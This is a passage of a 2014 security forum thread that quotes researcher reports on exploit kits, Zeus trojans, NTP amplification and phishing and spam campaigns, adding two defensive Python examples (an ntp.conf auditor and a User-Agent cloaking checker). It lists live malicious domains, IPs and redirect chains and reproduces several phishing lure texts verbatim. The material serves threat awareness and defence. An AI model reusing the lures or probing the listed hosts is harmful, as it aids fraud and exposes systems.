... domains are also responding to the same IP as the Epom .com domain at 198.178.124.5 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/76f5cc93794620c1808077fef71b1a1d43b6b63a5d2b2e62c2f4af60f57f7bbb/analysis/
___

Malware sites to block 14/2/14
- http://blog.dynamoo.com/2014/02/malware-sites-to-block-14214.html
14 Feb 2014 - "This bunch of OVH Canada hosted nameserver and IP ranges are supporting malware distribution via the Nuclear Exploit Kit (as described here* by Umbrella Labs). OVH Canada have a long history with this bad actor (who I believe to be r5x .org), and these /29 and /30 blocks spread throughout OVH's range make it more difficult to block the IPs. Are OVH providing snowshoe malware distribution services? It does look like it. Perhaps OVH can prove me wrong by banishing this bad customer once and for all. First of all, we have a set of nameservers being used to support mostly .pw domains hosting the Nuclear EK. The nameservers I can see that are active... (Long list at the dynamoo URL above)
Those nameservers are hosted in the following ranges, exclusively supplied by OVH Canada. If you are in a security-sensitive environment then I would recommend using larger blocks... (List of IP ranges at the dynamoo URL above)
I can see the following domains being actively supported by these nameservers, all of which should be considered hostile..." (Long list at the dynamoo URL above)

* http://labs.umbrella.com/2014/02/14/when-ips-go-nuclear/
Feb 14, 2014
___

Fake Flash install via Silverlight
- http://community.websense.com/blogs/securitylabs/archive/2014/02/14/fakeflash-installation-via-silverlight.aspx
Feb 14, 2014 - "... discovered attempts to infect users using the commonly distributed plug-in, Silverlight. Silverlight allows development of web and mobile applications that consist of streaming media, multimedia, graphics, and animation. It has been used for video streaming of events such as the 2008 Summer Olympics in Beijing, the 2010 Winter Olympics in Vancouver, and the 2008 conventions of both major United States political parties. Streaming services such as Netflix use Silverlight for Digital Rights Management (DRM). By leveraging two Silverlight plug-in vulnerabilities, CVE-2013-3896 and CVE-2013-0074, attackers have been able to infect victims via dropper files and subsequently through calls home to the command and control (C&C) server... the plug-in is a Base64 encoded Visual Basic Script (VBS). Silverlight generates the VBS file and places it in the directory C:\Users\<user name>\AppData\Local\Temp\Log... The downloaded binary is encrypted with the XOR key “m3S4V”. Using the ADODB.Stream ability to read and write text and binary files, a file named 4bb213.exe is created and run... At the time of initial investigation, fewer than 10% of AV vendors* had detection for the malicious files. The dropper files involved in this campaign are currently being identified as a Trojan threat by AV vendors. Based on call back activity, infected machines may be updated with additional dropper files by the C&C server when communication is established. The C&C server hosting the dropper file was registered via a domain privacy provider, while the resolving IP address is owned by the hosting provider 3NT Solutions. Communication attempts to the C&C server have been observed from the following countries:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0407.blog007.png
While Silverlight is not commonly used for business purposes, its use for web applications and streaming gives it a strong presence on devices owned by everyday users. With many companies embracing BYOD policies, applications such as Silverlight provide malicious actors with another potential cyber-attack vector..."
* https://www.virustotal.com/en/file/e58a6e7c1b0d558c1e3abc249664c9cb1e15d75a1c57a20b3720e95e46c9ff77/analysis/

Silverlight current version: 5.1.20913.0 - http://www.microsoft.com/silverlight/

MS13-087
- http://technet.microsoft.com/en-us/security/bulletin/ms13-087
Oct 08, 2013 - "... upgrades previous versions of Silverlight to Silverlight version 5.1.20913.0..."

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3896 - 4.3

:fear::fear: :mad: :fear:

AplusWebMaster
2014-02-16, 15:22
FYI...

400Gbps DDoS attacks ...
- http://atlas.arbor.net/briefs/index#411367071
High Severity
13 Feb 2014
NTP reflection/amplification attacks continue to gain momentum. Indicators of attacks up to 400Gbps have been discussed. Mitigations are ongoing, however the situation is still volatile.
Analysis: Despite multiple efforts to notify those running NTP servers that are not yet up to date and allow for a much larger amplification attack, the number of NTP servers that function beautifully as attack amplification sources is still quite high. Stressor services are known to implement NTP amplification attacks (along with SNMP and DNS amplification attacks and likely others) and lists of vulnerable NTP servers are shared on underground forums, leading to many copycat attacks. Several NTP amplification attack scripts have been shared on underground forums and elsewhere which makes this attack within easy reach of anyone who has a system that can originate spoofed traffic...

- https://www.us-cert.gov/ncas/alerts/TA14-013A
Last revised: Feb 05, 2014 - "... all versions of ntpd prior to 4.2.7 are vulnerable... upgrade all versions of ntpd that are publically accessible to at least 4.2.7... where it is not possible to upgrade the version of the service, it is possible to -disable- the monitor functionality in earlier versions of the software. To disable “monlist” functionality on a public-facing NTP server that cannot be updated to 4.2.7, add the “noquery” directive to the “restrict default” line in the system’s ntp.conf, as shown below:
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery "

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211 - 5.0
Last revised: 01/24/2014 - "... as exploited in the wild in December 2013."

>> http://www.ntp.org/downloads.html
2014/02/10 - 4.2.7p421

NTP attacks continue ...
- http://www.arbornetworks.com/asert/2014/03/ntp-attacks-continue-a-quick-look-at-traffic-over-the-past-few-months/
3/10/2014
___

FTP sites compromised to serve malware and scams
- https://net-security.org/malware_news.php?id=2709
Feb 14, 2014 - "Some 7,000 FTP sites and servers have been compromised to serve malware, and its administrators are usually none the wiser... FTP sites function as online file caches and are accessible remotely - usually via Web browsers. Users who have the required login credentials can upload and download files from them, but other users can also retrieve certain files hosted on such a server if given a specific link that leads to the file (and without needing to provide login credentials). It is this latter capacity that makes login credentials to FTP servers a prized haul for cyber scammers, as they upload malware and malicious links to the server, then embed direct links to them in spam emails delivered to potential victims. Access to an FTP server can also be occasionally leveraged by the attackers to compromise connected web services. "The victim companies hosting exploited FTP sites are spread across the spectrum – from small companies and individual accounts with ISPs to major multi-national corporations," noted the researchers*. "Hackers planted PHP scripts armed with backdoors (shells) and viruses in multiple directories hoping that these directories map to web servers of the victim companies to gain control of the web services. They also uploaded HTML files with seamless re-directs to malicious sites"... It is unknown who stole the FTP credentials, and who is using them, but judging by the complexity of some of the passwords, it's natural to assume that they haven't been guessed, but stolen via information-stealing malware. Also, some sites have default or publicized login credentials, so exploitation of them is easy."
* http://www.holdsecurity.com/#!news2013/c13i1
Feb 13, 2014
___

Fake "Account Credited" / TTCOPY.jar SPAM
- http://blog.dynamoo.com/2014/02/account-credited-ttcopyjar-spam.html
16 Feb 2014 - "This spam email comes with a malicious .JAR attachment:
From: Tariq Bashir muimran@ giki .edu .pk
Reply-To: Tariq Bashir [ta.ba@ hot-shot .com]
Date: 15 February 2014 11:03
Subject: Account Credited
Dear Sir,
I am sorry for my late response; our bank has credited 50% of Total amount on invoice to your bank account, the balance will be paid against BOL.
Find attached Bank TT and update us on delivery schedule.
Regards,
Tariq Bashir
Remal Al Emarat Travel & Tourism L.L.C.
Al Muteena Street, Salsabeel Building, 103
P.O. Box 56260, Dubai, UAE
Tel: +971 4 271 54 06
Fax: +971 4 271 50 65
Mobile: +971 50 624 62 05
e-mail: ta.ba@ hot-shot .com

The spam email originates from 121.52.146.226 (mail.giki .edu .pk) and comes with a malicious attachment TTCOPY.jar which is a Java application. This has a VirusTotal detection rate of 12/50* and the Malwr analysis reports** an attempted connection to clintiny.no-ip .biz on 67.215.4.123 (GloboTech, Canada / MaXX Ltd, Germany). Although this is an unusual threat, Java attacks are one of the main ways that an attacker will gain access to your system. I strongly recommend -deinstalling- Java if you have it installed. I can find two highly suspect IP blocks belonging to MaXX Ltd which I recommend blocking, along with the domains specified below..." (Long list at the dynamoo URL above.)
* https://www.virustotal.com/en/file/f74df04a59a11739361f522d245d089f7418fdc508e1f73e06b13c1d2b30b61e/analysis/1392589951/

** https://malwr.com/analysis/Y2I2MDcxYWUyMTRlNGE0YzhiNjk0YzE1M2QwNTAyNjI/

- https://www.virustotal.com/en-gb/ip-address/67.215.4.123/information/

:fear::fear:
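The US-CERT "noquery" mitigation quoted in the NTP item in the post above, turned into a configuration check. This is an added example, not code from US-CERT, ntp.org or the forum post; it assumes only the stock ntp.conf `restrict` syntax, and the function names and the sample configuration are constructed for the example.

```python
"""Audit an ntp.conf for the NTP 'monlist' amplification mitigation.

Added example, not code from US-CERT, ntp.org or the forum post.
US-CERT TA14-013A recommends adding 'noquery' to the 'restrict default'
lines of an ntpd that cannot be upgraded to 4.2.7; this module checks
whether a configuration does that and produces a hardened copy if not.
Function names and the sample configuration are constructed here.
"""
import re

# Flags on the default restriction recommended by US-CERT TA14-013A.
RECOMMENDED_FLAGS = ("kod", "nomodify", "notrap", "nopeer", "noquery")

# Matches 'restrict default ...', 'restrict -4 default ...' and
# 'restrict -6 default ...'; group 1 holds whatever flags follow.
_RESTRICT_DEFAULT = re.compile(r"^\s*restrict\s+(?:-[46]\s+)?default\b(.*)$")


def restrict_default_flags(line):
    """Return the flags on a 'restrict default' line (comment stripped),
    or None if the line is not a default restriction at all."""
    match = _RESTRICT_DEFAULT.match(line.partition("#")[0])
    if match is None:
        return None
    return match.group(1).split()


def audit_ntp_conf(text):
    """Return one (line_no, line, missing_flags) tuple per default
    restriction that lacks a recommended flag. A configuration with no
    default restriction at all is reported as line 0: a pre-4.2.7 ntpd
    then answers every client, monlist included."""
    findings = []
    seen_default = False
    for line_no, line in enumerate(text.splitlines(), 1):
        flags = restrict_default_flags(line)
        if flags is None:
            continue
        seen_default = True
        missing = [f for f in RECOMMENDED_FLAGS if f not in flags]
        if missing:
            findings.append((line_no, line.strip(), missing))
    if not seen_default:
        findings.append((0, "", ["no 'restrict default' line present"]))
    return findings


def harden_ntp_conf(text):
    """Return a copy of text whose default restrictions carry every
    recommended flag. Existing flags and comments are kept, missing flags
    are appended, and IPv4/IPv6 default lines are added if absent."""
    out = []
    seen_v4 = seen_v6 = False
    for line in text.splitlines():
        code, sep, comment = line.partition("#")
        flags = restrict_default_flags(code)
        if flags is None:
            out.append(line)
            continue
        if re.match(r"^\s*restrict\s+-6\s", code):
            seen_v6 = True
        else:
            seen_v4 = True
        missing = [f for f in RECOMMENDED_FLAGS if f not in flags]
        if missing:
            code = code.rstrip() + " " + " ".join(missing) + (" " if sep else "")
        out.append(code + sep + comment)
    if not seen_v4:
        out.append("restrict default " + " ".join(RECOMMENDED_FLAGS))
    if not seen_v6:
        out.append("restrict -6 default " + " ".join(RECOMMENDED_FLAGS))
    return "\n".join(out) + "\n"


# Constructed sample: both default lines lack 'noquery', so monlist is answered.
SAMPLE_NTP_CONF = """\
# constructed sample ntp.conf, not taken from any real host
driftfile /var/lib/ntp/ntp.drift
restrict default kod nomodify notrap nopeer   # noquery missing
restrict -6 default kod nomodify notrap nopeer
restrict 127.0.0.1
restrict ::1
server 0.pool.ntp.org iburst
"""

if __name__ == "__main__":
    for line_no, line, missing in audit_ntp_conf(SAMPLE_NTP_CONF):
        print(f"line {line_no}: missing {', '.join(missing)}: {line}")
    print("--- hardened ---")
    print(harden_ntp_conf(SAMPLE_NTP_CONF), end="")
```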

AplusWebMaster
2014-02-17, 23:38
FYI...

Fake Evernote SPAM
- http://blog.dynamoo.com/2014/02/fake-evernote-image-has-been-sent-spam.html
17 Feb 2014 - "... the RU:8080 gang appears to have been back for a while, but I haven't had a lot of samples.. here's a new one...
Date: Mon, 17 Feb 2014 16:19:40 -0700 [18:19:40 EST]
From: accounts@ pcfa .co .in
Subject: Image has been sent
Image has been sent.
DSC_990341.jpg 33 Kbytes
Go To Evernote
Copyright 2014 Evernote Corporation. All rights reserved

The links in the email go to:
[donotclick]www.aka-im .org/1.html
[donotclick]bluebuddha .us/1.html
Which in turn loads a script from:
[donotclick]merdekapalace .com/1.txt
[donotclick]www.shivammehta .com/1.txt
That in turn attempts to load a script from [donotclick]opheevipshoopsimemu .ru:8080/dp2w4dvhe2 which is multihomed on the following IPs... (IP list at the dynamoo URL above)
The URLquery report* on the landing site indicates a possible Angler Exploit Kit, although the code itself is hardened against analysis. There are a number of other hostile sites on those same IPs... I would recommend blocking the following IPs and domains..." (Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=9484541
___

Fake Evernote emails serve client-side exploits ...
- http://www.webroot.com/blog/2014/02/18/spamvertised-image-sent-evernote-themed-campaign-serves-client-side-exploits/
Feb 18, 2014 - "Cybercriminals continue to populate their botnets, with new infected hosts, through the persistent and systematic spamvertising of tens of thousands of fake emails which impersonate popular and well known brands – all in an attempt to socially engineer prospective victims into interacting with the scam. We’ve recently intercepted a currently circulating malicious spam campaign, impersonating Evernote, serving client-side exploits to prospective victims who click on the links found in the -fake- emails...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2014/02/Evernote_Malware_Malicious_Software_Client_Side_Exploits_Spam_Spamvertised.png
Sample redirection chain: hxxp ://nortonfire .co .uk/1.html (82.165.213.55) -> hxxp ://merdekapalace .com/1.txt – 202.71.103.21 -> hxxp ://www.shivammehta .com/1.txt – 181.224.129.14 -> hxxp ://ypawhygrawhorsemto .ru:8080/z4ql9huka0
Domain name reconnaissance for the fast-fluxed ypawhygrawhorsemto .ru... (IP list at the webroot URL above)
Responding to 78.108.93.186, are also the following malicious domains... (list at the webroot URL above)
Name servers used in the campaign:
Name server: ns1.ypawhygrawhorsemto .ru – 173.255.243.199
Name server: ns2.ypawhygrawhorsemto .ru – 119.226.4.149
Name server: ns3.ypawhygrawhorsemto .ru – 192.237.247.65
Name server: ns4.ypawhygrawhorsemto .ru – 204.232.208.115 ...
Detection rate for a sample served client-side exploit:
MD5: c81b2b9fbee87c6962299f066b983a46*
Domain name reconnaissance for the fast-fluxed opheevipshoopsimemu .ru... (IP list at the webroot URL above)
Name servers part of the campaign’s infrastructure:
Name server: ns1.opheevipshoopsimemu .ru. 173.255.243.199
Name server: ns2.opheevipshoopsimemu .ru. 119.226.4.149
Name server: ns3.opheevipshoopsimemu .ru. 192.237.247.65
Name server: ns4.opheevipshoopsimemu .ru. 204.232.208.115 ..."
* https://www.virustotal.com/en/file/c8e571de80affa42d3d062ba387a9d14716e869a9826e1048cdf17cc98771e46/analysis/

:fear::fear: :mad:

AplusWebMaster
2014-02-19, 14:20
FYI...

Phishing Scam – 'Apple ID Used to Download OS X Mavericks' Email
- http://www.hoax-slayer.com/mavericks-download-apple-id-phishing-scam.shtml
Feb 19, 2014 - "Email purporting to be from the Apple Security Department warns recipients that their Apple ID was used to download OS X Mavericks and urges them to open an attached file to confirm their accounts if they did not initiate the download. The email is -not- from Apple. It is a phishing scam designed to trick users into giving their Apple account login details and financial information to criminals. The attached file contains a -bogus- HTML form that requests account and credit card details. Example:
Dear Apple Customer,
Your Apple ID, was just used to download OS X Mavericks from the Mac App
Store on a computer or device that had not previously been associated with
that Apple ID.
This download was initiated from Spain.
If you initiated this download, you can disregard this email. It was only
sent to alert you in case you did not initiate the download yourself.
If you did not initiate this download, you have to confirm your account and
validate your informations, so we recommend you to :
1- Download the attached document and open it in a secure browser.
2- Follow the verification process to protect your account.
Your sincerely.
Apple Security Department.
Apple Support

This email, which purports to be from Apple's Security Department, warns recipients that their account was used to download a copy of OSX Mavericks from a computer or device not previously associated with their Apple ID. The message claims that the download was initiated from Spain. It suggests that, if recipients did not initiate the download, they should open an attached file to confirm their account and validate their 'informations'. However, the email is -not- from Apple and the warning about an unauthorized download is designed to trick people into opening the attached file. The attachment contains an HTML form that loads in the user's browser when opened. The -bogus- form first asks for the user's Apple account login details. It then asks for ID and credit card information, ostensibly so that the user's account can be verified and 'protected'. All the information submitted on the fake form can be harvested by criminals and used to hijack the real Apple accounts belonging to victims. The criminals may also conduct fraudulent credit card transactions and try to steal the identities of victims. The scammers responsible for the email hope that at least a few recipients will be panicked into opening the attachment and supplying the requested information in the mistaken belief that their Apple ID has been compromised. Like other high profile companies, Apple is almost continually targeted in phishing campaigns. Apple will never send you an unsolicited email that asks you to login and verify account details by clicking a link or opening an attached file."

___

'Product Testing UK' Facebook Survey Scam
- http://www.hoax-slayer.com/product-testing-survey-scam.shtml
Feb 19, 2014 - "Facebook messages originating from a Facebook Page called 'Product Testing UK' claim that testers are needed for iPhones and other products and invite users to click a link to fill in a 'Product Testing Application Form'... The messages and associated Facebook Page are part of a survey scam. The 'Application Form' link takes users to suspect third party survey websites that ask them to provide personal information to go in the draw for various prizes. Users will never get to test and keep the promised products. Do -not- click any links in these scam messages. Example:
PRODUCT TESTER NEEDED
Get brand new iPhone for Review it! Test it! Rate it & you will keep it!
CLICK HERE TO REGISTER YOURSELF-->[Link Removed]
*PRODUCT IS GIVING ACCORDING TO FIRST COME FIRST GET BASIS AND OFFER FOR ONLY UK.
> http://www.hoax-slayer.com/images/product-testing-uk-scam-1.jpg
According to messages currently appearing on Facebook, users can sign up as product testers for iPhones and other tech products by following a link and filling in an application form. The messages come from a Facebook Page called 'Product Testing UK'. The messages claim that users can keep the product they test after the testing process is over. However, the claims in the posts are -lies- and the Page is fraudulent. Those who click the link will not be taken to a 'Product Testing Application Form' as claimed. Instead, they will be redirected to various suspect 'survey' or 'offer' websites that promise the chance to win prizes in exchange for providing personal information. Some of the pages ask users to provide name, address and contact details, supposedly to allow them to go in the draw for a prize. Others will claim that users must provide their mobile phone number - thereby subscribing to absurdly expensive text messaging services - in order to get the results of a survey or go in the running for a prize. Users will be trapped in a confusing tangle of open webpages, all offering supposedly free gifts or services in exchange for participating. Often, trying to exit the pages will call up various pop-ups that try to convince the person to stay on the page rather than navigate away. The people who set up these scams earn a commission via dodgy affiliate marketing schemes whenever one of their victims completes an 'offer' or 'survey'. And, alas, no matter how many surveys or offers users complete, they will never get to fill in the product testing application form. Nor, of course, will they ever get to test and keep one of the promised testing products..."
___

Malicious mobile apps on Google Play up 400 percent
- https://net-security.org/malware_news.php?id=2713
Feb 19, 2014 - "RiskIQ* announced research findings on the presence of malicious apps contained in the Google Play store. The company found that malicious apps have grown 388 percent from 2011 to 2013, while the number of malicious apps removed annually by Google has -dropped- from 60% in 2011 to 23% in 2013. Apps for personalizing Android phones led all categories as most likely to be malicious. The most downloaded -malicious- app in 2013 was Talking Angela..."
* http://www.riskiq.com/company/press-releases/riskiq-reports-malicious-mobile-apps-google-play-have-spiked-nearly-400

:fear: :mad:

AplusWebMaster
2014-02-20, 14:45
FYI...

Cushion redirect on 62.212.128.22
- http://blog.dynamoo.com/2014/02/suspect-cushion-redirect-on-6221212822.html
20 Feb 2014 - "... there is an apparent cushion redirect running on 62.212.128.22 (XenoSite, Netherlands) using hijacked GoDaddy domains (which is never a good sign). An example can be found with this URLquery report* but in this case it seems to end up at a wallpaper site (picture here**). VirusTotal sees the IP*** as being somewhat suspect. Given that this is abusing subdomains of legitimate GoDaddy domains then on balance I would regard this as being malicious. All the subdomains I can find are listed here**** [pastebin], but they are all covered by this recommended blocklist..." (Blocklist at the dynamoo URL above.)
* http://urlquery.net/report.php?id=9546681

** http://urlquery.net/screenshot.php?id=9546681

*** https://www.virustotal.com/en-gb/ip-address/62.212.128.22/information/

**** http://pastebin.com/4UhwdY3a
___

Exploit Kits in Fake Skype, Evernote Themed Attacks
- http://community.websense.com/blogs/securitylabs/archive/2014/02/19/cyber-criminals-ramp-up-use-of-angler-and-goon-exploit-kits.aspx
Feb 19, 2014 - "... recent campaigns were themed around fake -Skype- voicemail notifications (Feb 19, 2014), and fake -Evernote- image notifications (Feb 7, 17-18, 2014). The emails try to lure the victim to click a link that will redirect through an intermediate site into pages that host the Angler Exploit Kit (later switched to "Goon" Exploit kit). The kits will exploit Java, Flash or Silverlight vulnerabilities and try to load an encrypted executable, to help evade detection...
Fake Skype messages:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5100.mal_5F00_skype_5F00_angler_5F00_EK.jpg
Fake Evernote Messages:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/4544.mal_5F00_evernote_5F00_ru_5F00_8080_5F00_angler_5F00_EK1.jpg
... Checking in Virus Total to provide context about AV coverage for this malware, we can see detection when first seen is 7/50*, and it looks like a Zeus variant...
* https://www.virustotal.com/en/file/9ca2c2585fdc866d2c402d2c23ce3c266f1c953aef2f3e09667d70855f9be822/analysis/1392844805/
... We have seen evidence and reports of the "ru:8080" gang switching to Angler Exploit Kit as far back as December 2013... The "ru:8080" criminal gang typically pushes trojans such as Cridex, Zeus GameOver, Click-Fraud trojans like ZeroAccess, and we have seen instances in the past of Ransomware such as RansomLock and worms like Andromeda. It looks like after a period of relatively little use of exploit kits, cyber criminals resume use of different exploit kits to deliver malware in email based attacks. However, the switch from one exploit kit to the other indicates several possibilities, one being that continuing to use a single Malware-as-a-Service for a long period is deemed too risky to maintain a profitable operation. Alternatively, the attackers are evaluating multiple exploit kits to determine which works the best, or multiple attackers may be leveraging the same bot-net and redirect structures... we see a relatively heavy bias from the attackers towards targets located in the UK, followed by US and Germany:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5415.Angler_5F00_ru_5F00_8080_5F00_lures_5F00_targets.jpg "
___

Zeus banking Trojan - back with another variant, ZeusVM
- http://www.theinquirer.net/inquirer/news/2329754/zeus-banking-trojan-is-back-with-another-variant-zeusvm
Feb 19 2014 - "... Dubbed ZeusVM, the modded version of the infamous Trojan is being distributed in many different ways, but typically through phishing emails or web-based attacks, including "malvertising", whereby people are infected by visiting websites containing malicious ads. "The Zeus/Zbot Trojan is one of the most notorious banking Trojans ever created; it's so popular it gave birth to many offshoots and copycats," Malwarebytes* said in a blog post... Malwarebytes senior security researcher Jerome Segura explained that there are various parts to this piece of malware. While the main executable - the bot - will bury itself into your computer and ensure it is reactivated every time you reboot, at regular intervals it also checks with its command and control server for new instructions while monitoring user activity... It can also perform wire transfers while the victim is logged in, Segura said, and even alter the appearance of the current account balance to ensure that it remains unnoticed... Fireeye has said that hackers are dropping standard malware like Zeus in favour of more advanced but harder to use remote access Trojans (RATs) such as Xtreme RAT... Xtreme RAT is a notorious RAT that has been freely available on a number of cyber black markets since June 2010. The RAT is dangerous as it can be used for a variety of purposes, including interacting with the victim machine via a remote shell, uploading and downloading files, interacting with the registry and manipulating running processes and services."
* http://blog.malwarebytes.org/security-threat/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/

:fear::fear: :mad:

AplusWebMaster
2014-02-21, 15:00
FYI...

Something evil on 74.50.122.8, 5.61.36.231 and 94.185.85.131
- http://blog.dynamoo.com/2014/02/something-evil-on-74501228-56136231-and.html
21 Feb 2014 - "Thanks to @Techhelplistcom for the heads up on this little mystery..
> http://3.bp.blogspot.com/-N6rkvf8I25o/UwcxH4K-quI/AAAAAAAACnU/OO02e4N6OhI/s1600/techhelplist.png
It all starts with a spam evil (described here*).. The link goes to a URLquery report that seems pretty inconclusive**, mentioning a URL of [donotclick]overcomingthefearofbeingfabulous .com/xjvnsqk/fbktojkxbxp.php [an apparently poorly secured*** server at 74.50.122.8, Total Internet Solutions Pvt. Ltd in India] that just does a redirect to a spammy diet pill site at thefxs .com [94.177.128.10, Linkzone Media Romania] if you have a Windows User Agent set. As Techhelplist says, set the UA to an Android one**** and you get a very different result. In this case you get bounced to a site hosted on 5.61.36.231 (3NT Solutions / Inferno .name)
[donotclick]mobile.downloadadobecentral .ru/FLVupdate.php then to
[donotclick]mobile.downloadadobecentral .ru/FLVupdate2.php from where it attempts to download a file FlashUpdate.apk . 3NT Solutions / inferno .name is a known bad actor[5] and you should block all their IPs on sight, in this case they have a netblock 5.61.32.0/20 which I strongly recommend that you route to the bitbucket. FlashUpdate.apk has a VirusTotal detection rate of 22/47[6], but most Android users are probably not running anti-virus software. The Andrubis analysis[7] of that .apk shows a network connection to 94.185.85.131 (Netrouting Telecom, Sweden) plus (oddly) some pages loaded from ticketmaster .com. It just goes to show that what you think might be harmless spam can actually be something very, very different if you access it on a mobile device.
Recommended blocklist:
5.61.32.0/20
94.177.128.10
74.50.122.8
94.185.85.131
downloadadobecentral .ru
jariaku .ru
350600700200 .ru
overcomingthefearofbeingfabulous .com "

* http://techhelplist.com/index.php/spam-list/477-some-random-android-malware-that-just-showed-up-one-day

** http://www.urlquery.net/report.php?id=9558246

*** https://www.virustotal.com/en/ip-address/74.50.122.8/information/

**** http://www.useragentstring.com/pages/Android%20Webkit%20Browser/

[5] http://blog.dynamoo.com/search/label/Iran

[6] https://www.virustotal.com/en-gb/file/88e772f4eb3ddd9c3010d16572b859dbbe30f01b5eec53722912073d3193b17b/analysis/1392977002/

[7] http://anubis.iseclab.org/?action=result&task_id=137700884db074714e1ec9508b977d314&format=html
___

Zeus variant targets Salesforce .com accounts, SaaS applications
- http://atlas.arbor.net/briefs/index#1152292298
Elevated Severity
20 Feb 2014
The Zeus malware - typically used as a banking trojan - was used to copy data from Salesforce .com after infecting a vulnerable home machine.
Analysis: Researchers speculate that pharming - redirecting traffic by manipulating settings such as hosts files on target systems and DNS servers in infrastructure gear - may have been a vector. Considering the home machine was most likely connected via a broadband router, it is possible that the router was exploited; however, enough information is not yet available to determine this. Initial indicators suggest that Zeus and other contemporary banking trojans in general have not been used to target Salesforce, therefore this may be a targeted attack, or an opportunistic attack that was leveraged in a more targeted manner once the threat actors understood the value of the compromised asset. It is also possible that access to this particular machine was purchased in the underground once a potentially opportunistic attacker realized they could sell access to other threat actors who have more strategic goals.
Source: http://www.zdnet.com/zeus-variant-targets-salesforce-com-accounts-saas-applications-7000026557/
___

Fake Intuit TurboTax email - "Issue on Your Refund"
- http://security.intuit.com/alert.php?a=99
2/20/14 - "People are receiving -fake- emails with the title "Issue on Your Refund". Below is a copy of the email people are receiving.
> http://security.intuit.com/images/tt2014phish.jpg
This is the end of the -fake- email.
Steps to Take Now
Do -not- open any attachment or -click- any links in the email...
Delete the email."

:mad: :fear:
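
The User-Agent-dependent redirect described in the dynamoo/Techhelplist post above (a diet-pill site for a Windows browser, an .apk download chain for an Android one) can be checked by following the redirect chain once per agent and comparing where each lands. This is an added example, not dynamoo's or Techhelplist's tooling; the hostnames and the FLVupdate.php / FLVupdate2.php hops come from the post, while the final FlashUpdate.apk path, the HTTP responses and the two UA strings are constructed.

```python
"""Follow one URL's redirect chain under several User-Agent strings and
flag UA-dependent cloaking, as in the dynamoo/Techhelplist analysis above.
Added example; the responses used for the demo are constructed, not live."""
from typing import Callable, Dict, List, Optional, Tuple
import http.client
import urllib.parse

# Illustrative UA strings (assumption: any desktop vs. Android pair will do).
WINDOWS_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"
ANDROID_UA = ("Mozilla/5.0 (Linux; U; Android 4.0.3; en-us) AppleWebKit/534.30 "
              "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
REDIRECT_CODES = {301, 302, 303, 307, 308}

# A fetcher performs ONE request and returns (status, lower-cased headers)
# without following redirects, so the chain is recorded hop by hop.
Fetcher = Callable[[str, str], Tuple[int, Dict[str, str]]]


def live_fetch(url: str, ua: str, timeout: float = 10.0) -> Tuple[int, Dict[str, str]]:
    """Real fetcher for an isolated analysis host: headers only, body discarded."""
    parts = urllib.parse.urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(parts.netloc, timeout=timeout)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    try:
        conn.request("GET", path, headers={"User-Agent": ua})
        resp = conn.getresponse()
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()


def follow_chain(url: str, ua: str, fetch: Fetcher, max_hops: int = 10) -> List[str]:
    """URLs visited from `url` until a non-redirect answer; max_hops cuts loops."""
    chain = [url]
    for _ in range(max_hops):
        status, headers = fetch(chain[-1], ua)
        if status not in REDIRECT_CODES or "location" not in headers:
            break
        # Location may be relative; resolve it against the current hop.
        chain.append(urllib.parse.urljoin(chain[-1], headers["location"]))
    return chain


def cloaking_report(url: str, fetch: Fetcher,
                    agents: Optional[Dict[str, str]] = None) -> dict:
    """Compare landing hosts per UA; differing hosts mean UA-based cloaking."""
    agents = agents or {"windows": WINDOWS_UA, "android": ANDROID_UA}
    chains = {name: follow_chain(url, ua, fetch) for name, ua in agents.items()}
    landing = {name: urllib.parse.urlsplit(c[-1]).hostname for name, c in chains.items()}
    return {
        "chains": chains,
        "landing": landing,
        "cloaked": len(set(landing.values())) > 1,
        # An .apk at the end of a chain that started from "harmless" spam is
        # exactly the tell the post describes.
        "serves_apk": any(c[-1].lower().endswith(".apk") for c in chains.values()),
    }


def constructed_fetch(url: str, ua: str) -> Tuple[int, Dict[str, str]]:
    """Offline stand-in reproducing the behaviour described in the post.
    Hosts and the FLVupdate.php/FLVupdate2.php hops are from the post; the
    final FlashUpdate.apk path and all responses are constructed."""
    host = urllib.parse.urlsplit(url).hostname
    if host == "overcomingthefearofbeingfabulous.com":
        if "Android" in ua:
            return 302, {"location": "http://mobile.downloadadobecentral.ru/FLVupdate.php"}
        return 302, {"location": "http://thefxs.com/"}
    if host == "mobile.downloadadobecentral.ru" and url.endswith("/FLVupdate.php"):
        return 302, {"location": "/FLVupdate2.php"}
    if host == "mobile.downloadadobecentral.ru" and url.endswith("/FLVupdate2.php"):
        return 302, {"location": "/FlashUpdate.apk"}
    return 200, {"content-type": "text/html"}


if __name__ == "__main__":
    report = cloaking_report(
        "http://overcomingthefearofbeingfabulous.com/xjvnsqk/fbktojkxbxp.php",
        constructed_fetch)
    for name, chain in report["chains"].items():
        print(name, " -> ".join(chain))
    print("cloaked:", report["cloaked"], "serves_apk:", report["serves_apk"])
```

Swap `constructed_fetch` for `live_fetch` only on an isolated analysis host; the report then shows which agents are steered to a different landing host.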

AplusWebMaster
2014-02-22, 14:41
FYI...

Attack code exploits critical bug in majority of Android phones
- http://atlas.arbor.net/briefs/index#610868271
Elevated Severity
Feb 20, 2014
